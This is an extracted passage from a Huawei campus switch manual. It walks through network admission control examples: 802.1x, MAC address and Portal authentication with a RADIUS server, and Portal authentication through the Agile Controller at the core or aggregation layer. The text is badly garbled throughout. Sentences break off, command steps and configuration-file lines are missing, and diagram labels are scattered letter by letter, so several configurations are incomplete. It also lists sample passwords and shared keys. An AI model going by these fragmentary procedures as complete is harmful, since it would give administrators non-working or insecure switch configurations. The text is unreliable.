Figure 10-31 Configuring multiple authentication modes to control internal user access
U se r
R A D IU S S e rve r
1 9 2 .1 6 8 .2 .3 0
…… G E 1 /0 /1 G E 1 /0 /2 N e tw o rk
VLAN 10 VLAN 20
U se r L A N S w itch S w itc h
P o rta l S e rve r
1 9 2 .1 6 8 .2 .2 0
P rin te r
2. Enable 802.1x authentication, MAC address authentication, and Portal authentication so
that the Switch can control network access rights of the internal employees, dumb
terminals, and visitors. In addition, configure 802.1x authentication to take precedence
because there are more employees than dumb terminals and visitors.
independently.
4. Configure a Portal server template so that the device can communicate with the Portal
server.
NOTE
Procedure
communication.


NOTE
added to VLAN 10.
domain.
RADIUS.
[Switch] aaa
[Switch-aaa] quit
Step 3 Configure 802.1x authentication, MAC address authentication, and Portal authentication on
the Switch.
NOTE
# Enable 802.1x authentication, MAC address authentication, and Portal authentication on the
interface GE1/0/1.
[Switch-GigabitEthernet1/0/1] authentication dot1x mac-authen portal


NOTE
# Bind the Portal server template abc to the interface GE1/0/1.

[Switch-GigabitEthernet1/0/1] web-auth-server abc direct

1. Run the display dot1x, display mac-authen, display portal, and display web-auth-
server configuration commands. The command output shows that 802.1x
authentication, MAC address authentication, and Portal authentication have been enabled
on the interface GE1/0/1.
2. The user can access the network after passing 802.1x authentication, MAC address
authentication, or Portal authentication.
3. After the user goes online, you can run the display access-user interface
gigabitethernet1/0/1 command on the device to check all online user information.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
domain isp1
#
%#
#
web-auth-server abc
server-ip 192.168.2.20
port 50200
%#
#
aaa
domain isp1
radius-server rd1
#
authentication dot1x mac-authen portal
#

#
return
10.4 Typical NAC Configuration (Unified Mode)

(V200R007C20, V200R009C00 and Later Versions)


distribution, and strict information security requirements.
Configuration Notes
l This example applies to V200R007C20, V200R009 and later versions.
l NOTE
l After enabling NAC on an interface, you cannot run the following commands on the
interface. Similarly, after running the following commands on an interface, you cannot
enable NAC on the interface.
Command Function

interface.

interface.


Command Function


As shown in Figure 10-32, terminals in a company's offices are connected to the company's
the company's service system and cause leakage of key information. Therefore, the
administrator requires that the Switch should control users' network access rights to ensure
The 802.1x authentication is configured and the RADIUS server is used to authenticate user
identities, to meet the company's high security requirements.
Figure 10-32 Networking diagram for configuring 802.1x authentication
Employee
RADIUS Server
VLANIF10 VLANIF20 192.168.2.30
192.168.1.10/24 192.168.2.10/24
Office area GE1/0/1 GE1/0/2

Intranet
VLAN 10 VLAN 20
……
LAN Switch Switch
Employee
1. Configure network interconnections.

2. Configure AAA on the Switch to implement identity authentication on access users
through the RADIUS server. The configuration includes configuring a RADIUS server
template, an AAA scheme, and an authentication domain, and binding the RADIUS
server template and AAA scheme to the authentication domain.
3. Configure 802.1x authentication to control network access rights of the employees in the
offices. The configuration includes:

a. Configure an 802.1x access profile.

b. Configure an authentication profile.
c. Enable 802.1x authentication on an interface.
NOTE
l Before performing operations in this example, ensure that user access terminals and the server can
communicate.
l This example only provides the configuration of the Switch. The configurations of the LAN Switch
and server are not provided here.
l In this example, the LAN switch exists between the access switch Switch and users. To ensure that
users can pass 802.1x authentication, you must configure the EAP packet transparent transmission
function on the LAN switch.
l Method 1: The S5700 is used as an example of the LAN switch. Perform the following
operations:
group-mac 0100-0000-0002 command in the system view of the LAN switch to configure
the LAN switch to transparently transmit EAP packets.
2. Run the l2protocol-tunnel user-defined-protocol 802.1x enable command on the
interface connecting to users and the interface connecting to the access switch to enable
the Layer 2 protocol transparent transmission function.
Procedure
Step 1 Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded.
# Configure GE1/0/1 connecting the Switch to users as an access interface and add the
interface to VLAN 10.
# Configure GE1/0/2 connecting the Switch to the RADIUS server as an access interface and
add the interface to VLAN 20.


Step 2 Configure AAA.

# Create the AAA authentication scheme abc and set the authentication mode to RADIUS.
[Switch] aaa
# Create the authentication domain huawei.com, and bind the AAA authentication scheme
abc and RADIUS server template rd1 to the domain.
[Switch-aaa-domain-huawei.com] authentication-scheme abc
[Switch-aaa-domain-huawei.com] radius-server rd1
[Switch-aaa] quit
# Check whether a user can pass RADIUS authentication. The test user test and password
Huawei2012 have been configured on the RADIUS server.
[Switch] test-aaa test Huawei2012 radius-template rd1
Info: Account test succeed.
Step 3 Configure 802.1x authentication.

NOTE
l By default, the unified mode is used.

l After changing the NAC mode from common to unified, save the configuration and restart the device to
make the configuration take effect.
# Configure the 802.1x access profile d1.

NOTE
By default, an 802.1x access profile uses the EAP authentication mode. Ensure that the RADIUS server
supports EAP; otherwise, the server cannot process 802.1x authentication request packets.
[Switch] dot1x-access-profile name d1
[Switch-dot1x-access-profile-d1] quit
# Configure the authentication profile p1, bind the 802.1x access profile d1 to the
authentication profile, specify the domain huawei.com as the forcible authentication domain
in the authentication profile, set the user access mode to multi-authen, and set the maximum
number of access users to 100.
[Switch-authen-profile-p1] dot1x-access-profile d1
[Switch-authen-profile-p1] access-domain huawei.com force


# Bind the authentication profile p1 to GE1/0/1 and enable 802.1x authentication on the
interface.

1. A user starts the 802.1x client on a terminal, and enters the user name and password for
authentication.
3. After users go online, you can run the display access-user access-type dot1x command
on the device to view information about online 802.1x authentication users.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
authentication-profile name p1
access-domain huawei.com force
#
radius-server shared-key cipher %#%#4*SO-2u,Q.\1C~%[eiB77N/^2wME;6t%6U@qAJ9:%#%#
#
dot1x-access-profile name d1
#
aaa
domain huawei.com
radius-server rd1
#
authentication-profile p1
#
#
interface Vlanif10
ip address 192.168.1.10 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.10 255.255.255.0
#
return

Related Content
Videos



Configuration Notes
l NOTE
Command Function

interface.

interface.


Command Function


As shown in Figure 10-33, terminals in a company's physical access control department are
information. Therefore, the administrator requires that the Switch should control users'
network access rights to ensure internal network security.
Because dumb terminals (such as printers) in the physical access control department cannot
have the authentication client installed, MAC address authentication needs to be configured
on the Switch. MAC addresses of terminals are used as user information and sent to the
RADIUS server for authentication. When users connect to the network, authentication is not
required.
Figure 10-33 Networking diagram for configuring MAC address authentication
Printer
RADIUS Server
Physical 192.168.1.10/24 192.168.2.10/24
access control
department GE1/0/1 GE1/0/2
Intranet
VLAN 10 VLAN 20
……
LAN Switch Switch
Printer


3. Configure MAC address authentication so that the Switch can control network access
rights of the dumb terminals in the physical access control department. The configuration
includes:
a. Configure a MAC access profile.
b. Configure an authentication profile.
c. Enable MAC address authentication on an interface.
NOTE
communicate.
l This example only provides the configuration of the Switch. The configurations of the LAN Switch
and server are not provided here.
Procedure
forwarded.


[Switch] aaa

[Switch-aaa] quit
Step 3 Configure MAC address authentication.

NOTE

# Configure the MAC access profile m1.
NOTE
In a MAC access profile, a MAC address without hyphens (-) is used as the user name and password for
MAC address authentication. Ensure that the formats of the user name and password for MAC address
authentication configured on the RADIUS server are the same as those configured on the access device.
[Switch] mac-access-profile name m1
[Switch-mac-access-profile-m1] quit
# Configure the authentication profile p1, bind the MAC access profile m1 to the
[Switch-authen-profile-p1] mac-access-profile m1
# Bind the authentication profile p1 to GE1/0/1 and enable MAC address authentication on
the interface.

1. After a user starts a terminal, the device automatically obtains the user terminal's MAC
address as the user name and password for authentication.
2. Users can access the network after being authenticated successfully.
3. After users go online, you can run the display access-user access-type mac-authen
command on the device to view information about online MAC address authentication
users.
----End

Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
mac-access-profile m1
#
#
mac-access-profile name m1
#
aaa
domain huawei.com
radius-server rd1
#
#
#
interface Vlanif10
ip address 192.168.1.10 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.10 255.255.255.0
#
return


management.

Configuration Notes
l NOTE
Command Function

interface.

interface.



As shown in Figure 10-34, terminals in a company's visitor area are connected to the
company's internal network through the Switch. Unauthorized access to the internal network
can damage the company's service system and cause leakage of key information. Therefore,
the administrator requires that the Switch should control users' network access rights to ensure
Because visitors move frequently, Portal authentication is configured and the RADIUS server
is used to authenticate user identities.

Figure 10-34 Networking diagram for configuring Portal authentication
RADIUS Server
/Portal Server
Visitor 192.168.2.10/24
192.168.1.10/24
Visitor area GE1/0/1 GE1/0/2

Intranet
VLAN 10 VLAN 20
……
LAN Switch Switch
Visitor

3. Configure Portal authentication to control network access rights of the visitors in the
visitor area. The configuration includes:
a. Configure a Portal server template
b. Configure a Portal access profile.
c. Configure an authentication profile.
d. Enable Portal authentication on an interface.
NOTE
communicate.
l This example only provides the configuration of the Switch. The configurations of the LAN Switch and
server are not provided here.
Procedure
forwarded.




[Switch] aaa
[Switch-aaa] quit

NOTE

# Configure the Portal server template abc.

[Switch-web-auth-server-abc] url http://192.168.2.30:8080/portal

NOTE
Ensure that the port number configured on the device is the same as the port number used by the Portal server.
# Configure the Portal access profile web1.

[Switch] portal-access-profile name web1
[Switch-portal-acces-profile-web1] web-auth-server abc direct
[Switch-portal-acces-profile-web1] quit
# Configure the authentication profile p1, bind the Portal access profile web1 to the
[Switch-authen-profile-p1] portal-access-profile web1
NOTE
In this example, users use static IP addresses. If users obtain IP addresses using DHCP and the DHCP server
is on the upstream network of the Switch, configure an authentication-free rule to allow packets from the
network segment of the DHCP server to pass through. If the URL to the Portal server needs to be resolved by
the DNS server that is on the upstream network of the Switch, configure an authentication-free rule to allow
packets from the network segment of the DNS server to pass through.
# Bind the authentication profile p1 to GE1/0/1 and enable Portal authentication on the
interface.

1. After a user opens the browser and enters any website address, the user is redirected to
the Portal authentication page. The user then can enter the user name and password for
authentication.
3. After users go online, you can run the display access-user access-type portal command
on the device to view information about online Portal authentication users.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
portal-access-profile web1
#


#
web-auth-server
abc
server-ip
192.168.2.30
port
50200
shared-key cipher %#%#CR@WPM9Q30%]A}9]g4hUqe1u~4Fz}PlU)QPL;73#%#

%#
url http://192.168.2.30:8080/
portal
#
portal-access-profile name
web1
web-auth-server abc
direct
#
aaa
domain huawei.com
radius-server rd1
#
#
#
interface Vlanif10
ip address 192.168.1.10 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.10 255.255.255.0
#
return
10.5 Typical NAC Configuration (Unified Mode) (the

Agile Controller as the Authentication Server)
(V200R007C00 and Earlier Versions, V200R008C00)


Internal User Access to the Enterprise Network (Authentication
Point on Core Switch)
Portal authentication is a Network Admission Control (NAC) method. Portal authentication is
also called web authentication. Generally, Portal authentication websites are referred to as
Portal websites. Users must be authenticated by the Portal websites before they can use
network services.
Portal authentication is insecure, but allows flexible networking as no client software is
required on users' terminals. 802.1x authentication is another NAC method. It is more secure
than Portal authentication, but requires the installation of client software on users' terminals,
resulting in networking inflexibility. Like Portal authentication, MAC address authentication
also does not require the installation of client software, but user terminals' MAC addresses
must be registered on the authentication server. Network configuration and management is
complex.
Portal authentication applies to the users who are sparsely distributed and move frequently,
for example, guests of a company.
Configuration Notes
l NOTE
To know details about software mappings, see Version Mapping Search for Huawei Campus
Switches.
l Huawei's Agile Controller in V100R001C00 functions as the Portal server and RADIUS
server in this example. For the Agile Controller, the minimum version required is
V100R001C00.
l The RADIUS authentication and accounting shared keys and Portal shared key on the
switch must be the same as those on the Agile Controller server.
l By default, the switch allows the packets from RADIUS and Portal servers to pass. You
do not need to configure authentication-free rules for the two servers on the switch.
An enterprise needs to deploy an identity authentication system to control employees' network
access rights and allow only authorized users to access the network.
The enterprise has the following requirements:
l The authentication operations should be simple. The authentication system only
performs access authorization. Minimum client software is installed on user terminals.
l To facilitate network reconstruction and reduce investments, the enterprise requires the
authentication point be deployed on the core switch.
l A unified identity authentication mechanism is used to authenticate all terminals
accessing the campus network and deny access from unauthorized terminals.
l R&D employees can connect only to public servers (such as the web and DNS servers)
of the enterprise before the authentication, and can connect to both the intranet (code
library and issue tracking system) and Internet after being authenticated.

l Marketing employees can connect only to public servers (such as the web and DNS
servers) of the enterprise before the authentication, and can connect only to the Internet
after being authenticated.
Figure 10-35 Portal authentication deployed at the core layer

P re -a u th e n tica tio n
d o m a in
In te rn e t

D N S se rve r (in clu d e s P o rta l a n d W e b se rve r
R A D IU S se rve rs)
C o re sw itch
G E 1 /0 /2 P o st-a u th e n tica tio n
S w itc h D
d o m a in
G E 1 /0 /1
A g g re g a tio n
G E 1 /0 /3
sw itch
S w itc h C Code
Issu e tra ckin g
co n fig u ra tio n
G E 1 /0 /1 G E 1 /0 /2 syste m
b a se
G E 0 /0 /2 G E 0 /0 /2
A cce ss sw itch
G E 0 /0 /1 G E 0 /0 /1
R & D D e p t. M a rke tin g

D e p t.
G E 0 /0 /
4
A u th e n tica tio n p o in t
PC PC L a p to p PC
VLAN Plan
Table 10-3 VLAN plan

VLAN ID Function
101 VLAN for R&D employees
102 VLAN for marketing employees
103 VLAN for connection between the

aggregation switch and core switch
104 VLAN to which interfaces connecting to the

servers belong

Network Data Plan
Table 10-4 Network data plan

Item Data Description
Access switch Interface number: GE0/0/1 Connects to employees' PCs.

(connecting to the R&D VLAN: 101
department)
Interface number: GE0/0/2 Connects to the aggregation
VLAN: 101 switch.

(connecting to the VLAN: 102
marketing department)
VLAN: 102 switch.
Aggregation switch Interface number: GE1/0/1 Connects to the access switch

VLAN: 101 of the R&D department.
VLANIF101 IP address: Functions as the gateway for
192.168.0.1 R&D employees.
Interface number: GE1/0/2 Connects to the access switch

VLAN: 102 of the marketing department.
192.168.1.1 marketing employees.
Interface number: GE1/0/3 Connects to the core switch.

VLAN: 103
VLANIF103 IP address:
172.16.2.1
Core switch Interface number: GE1/0/1 Connects to the aggregation

VLAN: 103 switch.
172.16.2.2
Interface number: GE1/0/2 Connects to the server area

VLAN: 104 and functions as the gateway
for the servers.
172.16.1.254
Server Agile IP address: 172.16.1.1 -

Controller
(RADIUS
server +
Portal
server)

DNS IP address: 172.16.1.2 -

server
Web server IP address: 172.16.1.3 -
Code IP address: 172.16.1.4 -

library
Issue IP address: 172.16.1.5 -

tracking
system
Service Data Plan
Table 10-5 Service data plan

Core switch Number of the ACL for R&D You need to enter this ACL
employees' post-authentication number when configuring
domain: 3001 authorization rules and results on
the Agile Controller.
Number of the ACL for marketing You need to enter this ACL
Authentication server: l The Service Controller (SC) of

l IP address: 172.16.1.1 the Agile Controller integrates
the RADIUS server and Portal
l Port number: 1812 server. Therefore, IP addresses
l RADIUS shared key: of the authentication server,
Admin@123 accounting server,
authorization server, and Portal
Accounting server: server are the SC's IP address.
l IP address: 172.16.1.1 l Configure a RADIUS
l Port number: 1813 accounting server to collect
l RADIUS shared key: user login and logout
Admin@123 information. The port numbers
of the authentication server and
l Accounting interval: 15 accounting server must be the
same as the authentication and
accounting port numbers of the
RADIUS server.
l Configure an authorization
server to enable the RADIUS
server to deliver authorization
rules to the switch. The

Portal server: RADIUS shared key of the

l IP address: 172.16.1.1 authorization server must be
the same as those of the
l Port number that the switch authentication server and
uses to process Portal protocol accounting server.
packets: 2000
l Destination port number in the
packets that the switch sends to
the Portal server: 50200
l Portal authentication shared
key: Admin@123
Agile Controller Host name: access.example.com Users can use the domain name to
access the Portal server.
Device IP address: 172.16.1.254 -
Authentication port: 1812 -
Accounting port: 1813 -
RADIUS shared key: Admin@123 The RADIUS shared key must be

the same as that configured on the
switch.
Port number that the Portal server -

uses to receive packets: 50200
Portal shared key: Admin@123 It must be the same as the Portal

authentication shared key
configured on the switch.
Department: R&D Two departments and two

l User: A corresponding accounts have been
created on the Agile Controller:
l Account: A-123 R&D department and an R&D
l Password: Huawei123 employee account A-123;
Department: Marketing Marketing department and a
marketing employee account
l User: B B-123.
l Account: B-123
l Password: Huawei123
Pre- Agile Controller (including -

authentication RADIUS server and Portal server),
domain DNS server, and web server
Post- l R&D employees: code library, -

authentication issue tracking system, and
domain Internet
l Marketing employees: Internet

1. Configure the access switch, aggregation switch, and core switch to ensure network
connectivity.
2. Configure Portal authentication on the core switch to implement user access control.
Configure parameters for connecting to the RADIUS server and those for connecting to
the Portal server, enable Portal authentication, and configure network access rights for
the pre-authentication domain and post-authentication domain.
3. Configure the Agile Controller:
a. Log in to the Agile Controller.
b. Add user accounts to the Agile Controller.
c. Add a switch to the Agile Controller and configure related parameters to ensure
normal communication between the Agile Controller and switch.
d. Add authorization results and authorization rules to grant different access rights to
R&D employees and marketing employees after they are successfully authenticated.
Procedure
Step 1 Configure the access switch to ensure network connectivity.
The following provides the configuration for SwitchA, the access switch connecting to the
R&D department. The configuration for SwitchB, the access switch connecting to the
marketing department, is similar to that for SwitchA.
[SwitchA] vlan 101
[SwitchA] interface gigabitethernet 0/0/1 //Interface connected to the R&D
department
[SwitchA] interface gigabitethernet 0/0/2 //Interface connected to the
aggregation switch
[SwitchA] quit
<SwitchA> save //Save the configuration.
Step 2 Configure the aggregation switch to ensure network connectivity.

[SwitchC] dhcp enable //Enable the DHCP service.
[SwitchC] interface gigabitethernet 1/0/1 //Interface of the access switch
connected to the R&D department
[SwitchC-GigabitEthernet1/0/1] port trunk pvid vlan 101
[SwitchC-GigabitEthernet1/0/1] port trunk allow-pass vlan 101
[SwitchC] interface vlanif 101
[SwitchC-Vlanif101] ip address 192.168.0.1 255.255.255.0 //IP address segment
assigned to R&D employees
[SwitchC-Vlanif101] dhcp select interface
[SwitchC-Vlanif101] dhcp server dns-list 172.16.1.2
[SwitchC-Vlanif101] quit
connected to the marketing department


[SwitchC-Vlanif102] ip address 192.168.1.1 255.255.255.0 //IP address segment
assigned to marketing employees
[SwitchC] interface gigabitethernet 1/0/3 //Interface connected to the core
switch
[SwitchC-Vlanif103] ip address 172.16.2.1 255.255.255.0
[SwitchC] ip route-static 172.16.1.0 255.255.255.0 172.16.2.2 //Configure
routes to the network segment in which the authentication server resides.
[SwitchC] quit
<SwitchC> save //Save the configuration.
Step 3 Configure the core switch.

1. Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded.
[SwitchD] interface gigabitethernet 1/0/1 //Interface connected to the
aggregation switch
[SwitchD-GigabitEthernet1/0/1] port trunk allow-pass vlan 103
[SwitchD] interface vlanif 103
[SwitchD-Vlanif103] ip address 172.16.2.2 255.255.255.0
[SwitchD-Vlanif103] quit
server area
[SwitchD-Vlanif104] ip address 172.16.1.254 255.255.255.0 //Configure the
gateway address for the server area.
[SwitchD] ip route-static 192.168.0.0 255.255.255.0 172.16.2.1 //Configure
routes to the network segment assigned to the R&D department.
routes to the network segment assigned to the marketing department.
[SwitchD] quit
<SwitchD> save //Save the configuration.
2. Configure parameters for connecting to the RADIUS server.

<SwitchD> system-view
[SwitchD] radius-server template policy //Create the RADIUS server
template policy.
[SwitchD-radius-policy] radius-server authentication 172.16.1.1 1812 //
Configure the IP address and port number of the RADIUS authentication server.
[SwitchD-radius-policy] radius-server accounting 172.16.1.1 1813 //
Configure the IP address and port number of the RADIUS accounting server.
[SwitchD-radius-policy] radius-server shared-key cipher Admin@123 //Set
the authentication key and accounting key to Admin@123.
[SwitchD-radius-policy] quit
[SwitchD] aaa //Enter the AAA view.
[SwitchD-aaa] authentication-scheme auth //Configure the authentication
scheme auth.
[SwitchD-aaa-authen-auth] authentication-mode radius //Set the
authentication mode to RADIUS.

[SwitchD-aaa-authen-auth] quit
[SwitchD-aaa] accounting-scheme acco //Configure the accounting scheme
acco.
[SwitchD-aaa-accounting-acco] accounting-mode radius //Set the accounting
mode to RADIUS.
[SwitchD-aaa-accounting-acco] accounting realtime 15 //Set the real-time
accounting interval to 15 minutes.
[SwitchD-aaa-accounting-acco] quit
[SwitchD-aaa] domain portal //Configure a domain.
[SwitchD-aaa-domain-portal] authentication-scheme auth //Bind the
authentication scheme auth to the domain.
[SwitchD-aaa-domain-portal] accounting-scheme acco //Bind the accounting
scheme acco to the domain.
[SwitchD-aaa-domain-portal] radius-server policy //Bind the RADIUS server
template policy to the domain.
[SwitchD-aaa-domain-portal] quit
[SwitchD-aaa] quit
[SwitchD] domain portal //Configure portal as the global default domain.
3. Configure parameters for connecting to the Portal server.

[SwitchD] web-auth-server portal_huawei //Configure the Portal server
template portal_huawei.
[SwitchD-web-auth-server-portal_huawei] server-ip 172.16.1.1 //Set the
Portal server IP address.
[SwitchD-web-auth-server-portal_huawei] source-ip 172.16.1.254 //Set the
IP address that the switch uses to communicate with the Portal server.
[SwitchD-web-auth-server-portal_huawei] port 50200 //Set the destination
port number in the packets that the switch sends to the Portal server to
50200, which is the same as the port number that the Portal server uses to
receive packets. The default destination port number on the switch is 50100,
and you must change it to 50200 manually, so that it matches the port number
on the Portal server.
[SwitchD-web-auth-server-portal_huawei] shared-key cipher Admin@123 //
Configure the shared key for communication with the Portal server, which must
be the same as that configured on the Portal server.
[SwitchD-web-auth-server-portal_huawei] url http://access.example.com:8080/
portal //Configure the URL for the Portal authentication page, in which
access.example.com indicates the host name of the Portal server. The domain
name is recommended in the URL so that the Portal authentication page can be
pushed to users faster and more securely. To use the domain name in the URL,
you must configure the mapping between this domain name access.example.com
and Portal server IP address on the DNS server in advance.
[SwitchD-web-auth-server-portal_huawei] quit
[SwitchD] web-auth-server listening-port 2000 //Configure the port number
that the switch uses to process Portal protocol packets. The default port
number is 2000. If the port number is changed on the server, change it
accordingly on the switch.
[SwitchD] portal quiet-period //Enable the quiet function for Portal
authentication users. If the number of times that a Portal authentication
user fails to be authenticated within 60 seconds exceeds the specified value,
the device discards the user's Portal authentication request packets for a
period to prevent impact of frequent authentication failures on the system.
[SwitchD] portal quiet-times 5 //Configure the maximum number of
authentication failures within 60 seconds before the device quiets a Portal
authentication user.
[SwitchD] portal timer quiet-period 240 //Set the quiet period to 240
seconds.
4. Enable Portal authentication.

[SwitchD] authentication unified-mode //Set the NAC mode to unified. By
default, the unified mode is enabled. After the NAC mode is changed, save the
configuration and restart the device to make the configuration take effect.
[SwitchD-Vlanif103] authentication portal //Enable Portal authentication
on the interface.
[SwitchD-Vlanif103] web-auth-server portal_huawei layer3 //Bind the Portal
server template to the interface, so the interface can control user access to
the enterprise network. If user terminals and the switch are connected
through a Layer 2 network, set the Portal authentication mode to direct. If
user terminals and the switch are connected through a Layer 3 network, set

the Portal authentication mode to layer3.

5. Configure network access rights for the pre-authentication domain and post-
[SwitchD] authentication free-rule 1 destination ip 172.16.1.2 mask
255.255.255.255 //Configure authentication-free rules for Portal
authentication users, so that these users can access the DNS server before
the authentication.
[SwitchD] authentication free-rule 2 destination ip 172.16.1.3 mask
authentication users, so that these users can access the web server before
the authentication.
[SwitchD] acl 3001 //Configure the post-authentication domain for R&D
employees.
[SwitchD-acl-adv-3001] rule 1 permit ip //Allow R&D employees to access
all resources.
[SwitchD-acl-adv-3001] quit
[SwitchD] acl 3002 //Configure the post-authentication domain for
marketing employees.
[SwitchD-acl-adv-3002] rule 1 deny ip destination 172.16.1.4 0 //Prevent
marketing employees from accessing the code library.
marketing employees from accessing the issue tracking system.
[SwitchD-acl-adv-3002] rule 3 permit ip //Allow marketing employees to
access other resources.
[SwitchD] quit
Step 4 Configure the Agile Controller.

1. Log in to the Agile Controller.
a. Open the Internet Explorer, enter the Agile Controller address in the address box,
and press Enter.
The following table provides two types of Agile Controller addresses.
Address Format Description
https://Agile Controller-IP: In the address, Agile Controller-IP indicates the

8443 Agile Controller IP address.
Agile Controller IP address If port 80 is enabled during installation, you

can access the Agile Controller by simply
entering its IP address without the port number.
The Agile Controller address will automatically
change to https://Agile Controller-IP:8443.
b. Enter the administrator account and password.

If you log in to the Agile Controller for the first time, use the super administrator
account admin and password Changeme123. Change the password immediately
after logging in. Otherwise, the Agile Controller cannot be used.
2. Create departments and accounts. The following describes how to create the R&D
department. Create the Marketing department similarly.
a. Choose Resource > User > User Management.
b. Click the Department tab in the operation area on the right. Then click Add under
the Department tab, and add the department R&D.

c. Click the User tab in the operation area on the right. Then click Add under the User
tab, and add the user A.

d. Click in the Operation column on the right of user A. The Account

Management page is displayed. Click Add, and create a common account A-123
with the password Huawei123.

e. On the User tab page, select user A and click Transfer to add user A to the R&D
department.

3. Add a switch to the Agile Controller and configure related parameters to ensure normal
communication between the Agile Controller and switch.
a. Choose Resource > Device > Device Management.
b. Click Add.
c. Configure parameters for the switch.
Name SW -
IP Address 172.16.1.254 The interface must be able to communicate

with the SC.
Device series Huawei -

Quidway Series
Authenticatio Admin@123 It must be the same as the shared key of the

n Key RADUIS authentication server configured on
the switch.
Charging Admin@123 It must be the same as the shared key of the

Key RADUIS accounting server configured on the
switch.
Real-time 15 It must be the same as the real-time

charging accounting interval configured on the switch.
interval
(minute)

Port 2000 This is the port that the switch uses to

communicate with the Portal server. Retain
the default value.
Portal Key Admin@123 It must be the same as the Portal shared key
Allowed IP 192.168.0.1/24; -
Addresses 192.168.1.1/24


d. Click OK.
1. Configure employee authorization. This example describes how to configure R&D
employee authorization. The configuration procedure for marketing employees is the
same, except that the network resources the two types of employees can access are
different.
a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Result, and configure resources that R&D employees can access
after authentication and authorization.
Name R&D employee post- -

authentication domain
Service Type Access Service -
ACL 3001 The ACL number must be the

Number/AAA same as the number of the
User Group ACL configured for R&D
employees on the switch.

b. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Rule, and specify the authorization conditions for R&D employees.
Name R&D employee -

authorization rule
Service Type Access User -
Department R&D -
Authorization R&D employee post- -

Result authentication domain


l Employees can access only the Agile Controller, DNS, and web servers before
authentication.
l The Portal authentication page is pushed to an employee when the employee attempts to
visit an Internet website. After the employee enters the correct account and password, the
requested web page is displayed.
l R&D employee A can access the Internet, code library, and issue tracking system after
authentication. Marketing employee B can access the Internet but not the code library
and issue tracking system after authentication.

l After an employee is authenticated, run the display access-user command on the switch.
The command output shows that the employee is online.
----End
Configuration Files
# Configuration file of the access switch for the employee department (The configuration file
of the access switch for the marketing department is similar.)
#
sysname SwitchA
#
vlan batch 101
#
#
#
return
# Configuration file of the aggregation switch

#
sysname SwitchC
#
vlan batch 101 to 103
#
dhcp enable
#
interface Vlanif101
ip address 192.168.0.1 255.255.255.0
dhcp server dns-list 172.16.1.2
#
interface Vlanif102
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif103
ip address 172.16.2.1 255.255.255.0
#
port trunk pvid vlan 101
#
#
#
ip route-static 172.16.1.0 255.255.255.0 172.16.2.2
#
return
# Configuration file of the core switch

#
sysname SwitchD

#
#
domain portal
#
radius-server template policy
radius-server shared-key cipher %#%#1*yT+0O\X;V}hP,G^TMN7mTXA^mIz)SoR:86;lNK%#%#
radius-server accounting 172.16.1.1 1813 weight 80
#
acl number 3001
rule 1 permit ip
acl number 3002
rule 1 deny ip destination 172.16.1.4 0
rule 3 permit ip
#
web-auth-server portal_huawei
server-ip 172.16.1.1
port 50200
shared-key cipher %#%#q9a^<=Ct5'=0n40/1g}/m6Mo,U9u5!s(GYM}Z{<~%#%#
url http://access.example.com:8080/portal
source-ip 172.16.1.254
#
aaa
authentication-scheme auth
accounting-scheme acco
accounting-mode radius
accounting realtime 15
domain portal
radius-server policy
#
interface Vlanif103
ip address 172.16.2.2 255.255.255.0
web-auth-server portal_huawei layer3
#
interface Vlanif104
ip address 172.16.1.254 255.255.255.0
#
#
#
ip route-static 192.168.0.0 255.255.255.0 172.16.2.1
ip route-static 192.168.1.0 255.255.255.0 172.16.2.1
#
authentication free-rule 1 destination ip 172.16.1.2 mask 255.255.255.255
portal quiet-period
portal timer quiet-period 240
portal quiet-times 5
#
return


Point on Aggregation Switch) (V200R007C00 and Earlier
Versions, V200R008C00)

network services.

complex.
Configuration Notes
l NOTE
Switches.
V100R001C00.

l Moderate security control is required. To facilitate maintenance, a moderate number of
authentication points need to be deployed on the aggregation switch.

Figure 10-36 Portal authentication deployed at the aggregation layer
In te rn e t
P re -a u th e n tic a tio n
d o m a in
C o re s w itc h
A g ile C o n tro lle r W eb
D N S s e rv e r
(in c lu d e s P o rta l a n d s e rv e r
R A D IU S s e rv e rs)
A g g re g a tio n s w itc h G E 1 /0 /3
P o s t-a u th e n tic a tio n
S w itc h C
G E 1 /0 /1 d o m a in
G E 1 /0 /2
C ode
Is s u e tra c k in g
c o n fig u ra tio n
G E 0 /0 /2 G E 0 /0 /2 s y s te m
base
S w itc h A A c c e s s s w itc h S w itc h B
G E 0 /0 /1 G E 0 /0 /1
M a rk e tin g
R & D D e p t.
D e p t.
A u th e n tic a tio n p o in t
PC PC L a p to p PC
VLAN Plan

VLAN ID Function

servers belong

Network Data Plan


department)
VLAN: 101 switch.

VLAN: 102 switch.


Interface number: GE1/0/3 Connects to the enterprise

VLAN: 103 server area.
172.16.1.254 servers.

Controller
(RADIUS
server +
Portal
server)

server

library

tracking
system

Service Data Plan

Aggregation Number of the ACL for R&D You need to enter this ACL
switch employees' post-authentication number when configuring

Portal server: same as the authentication and
l IP address: 172.16.1.1 RADIUS server.
l Port number that the switch l Configure an authorization
uses to process Portal protocol server to enable the RADIUS
packets: 2000 server to deliver authorization
l Destination port number in the rules to the switch. The
packets that the switch sends to RADIUS shared key of the
the Portal server: 50200 authorization server must be
authentication server and
key: Admin@123
accounting server.


switch.



l User: B B-123.
l Account: B-123


domain Internet
1. Configure the access switch and aggregation switch to ensure network connectivity.
2. Configure Portal authentication on the aggregation switch to implement user access
control. Configure parameters for connecting to the RADIUS server and those for
connecting to the Portal server, enable Portal authentication, and configure network
access rights for the pre-authentication domain and post-authentication domain.

Procedure
marketing department, is similar.
[SwitchA] vlan 101
department
aggregation switch
[SwitchA] quit
Step 2 Configure the aggregation switch.

forwarded.
[SwitchC-Vlanif101] ip address 192.168.0.1 255.255.255.0 //IP address
segment assigned to R&D employees
segment assigned to marketing employees.
[SwitchC] interface gigabitethernet 1/0/3 //Interface connected to the
server area
[SwitchC-Vlanif103] ip address 172.16.1.254 255.255.255.0 //Configure the
[SwitchC] quit


<SwitchC> system-view
[SwitchC] radius-server template policy //Create the RADIUS server
template policy.
